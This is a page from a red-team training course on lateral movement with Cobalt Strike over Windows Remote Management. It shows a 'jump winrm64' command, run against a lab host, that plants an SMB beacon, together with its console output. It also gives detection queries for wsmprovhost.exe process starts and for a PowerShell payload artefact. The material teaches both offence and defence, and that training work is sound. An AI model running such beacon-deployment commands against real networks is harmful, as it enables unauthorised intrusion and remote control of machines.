Windows Remote Management

The winrm and winrm64 methods can be used for 32 and 64-bit targets as appropriate.

The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.

beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30

WinRM will return a high integrity Beacon running as the user with which you're interacting with the remote machine as.

This new Beacon will be running inside wsmprovhost.exe, which is the "Host process for WinRM plug-ins". This is used whenever WinRM is used, legitimate or otherwise. You can search for process start events, but this will produce a lot of false positives if WinRM is being used legitimately by system administrators.

event.category: process and event.type: start and process.name: wsmprovhost.exe

The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.

event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"

PreviousLateral Movement NextPsExec

Last updated 2 years ago